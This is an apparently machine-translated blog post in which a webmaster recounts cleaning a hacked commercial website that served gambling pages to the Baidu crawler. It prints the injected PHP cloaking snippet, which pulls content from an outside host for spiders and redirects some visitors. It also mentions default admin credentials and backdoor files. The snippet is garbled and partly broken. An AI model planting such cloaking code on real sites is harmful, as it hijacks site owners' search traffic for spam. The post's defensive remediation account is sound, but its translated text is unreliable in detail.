Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall
The day before yesterday, QQ received a friend sent a message, asked me, I look at the entrepreneurial park when the friend, chatted up, his company's client's website was invaded
But he and I said that his client's website is not this kind of, and this has nothing to do with this, I opened the domain name to see the actual content is
is a commercial website, at this time my idea is very clear, first of all can be sure that the content of the spider is not the same, this is commonly used black hat technique, so you can get a lot of outside the chain, in order to further confirm my thinking, I decided to use Spider Simulator test results as follows:
Sure enough and I think the same, which proves my guess, this is usually in the site root directory to add a malformed file, so that the malformed file can not be deleted
And the priority is higher than the site itself, or the default file in the Web site to add a piece of code to call his file, to determine whether the person or spider
If it is a spider to show it the content of gambling, if it is a person to display the normal page, in the FTP account password for a step check,
It was my second trick to add the following PHP code to the file
$file = "http://www.***.com/seo/3.html";
$referer =$_server["Http_referer"];
$agent = Strtolower ($_server["http_user_agent"]);
if (Strstr ($referer, "Baidu") &&strstr ($referer, "456"))
{
Header ("Location: $url");
}
if (Ereg ("http://www.baidu.com/search/spider.htm", $agent))
{
$content =file_get_contents ($file);
Echo $content;
Exit;
}
? >
< PHP
This code to understand a look at it, I do not explain, in the root directory also found an encrypted file, that file seems to be a gambling web content, named Index.asp.asp next is to replace the index.php file and then delete the relevant back door, patched,
But when I get the website backstage the account password time I crashed, the password unexpectedly is the default, the account number is also the default, the procedure is Dede existence security flaw
Patch vulnerability with Dede Security Detection Tool a little check the Trojan horse and Webshell no extra found, patched up, and then use Spider Simulator to view
Web content and spider crawling content consistent with the next is @ Spider let spiders come crawling and update snapshots what how @ Spider? Aren't you?
Then I won't, hey!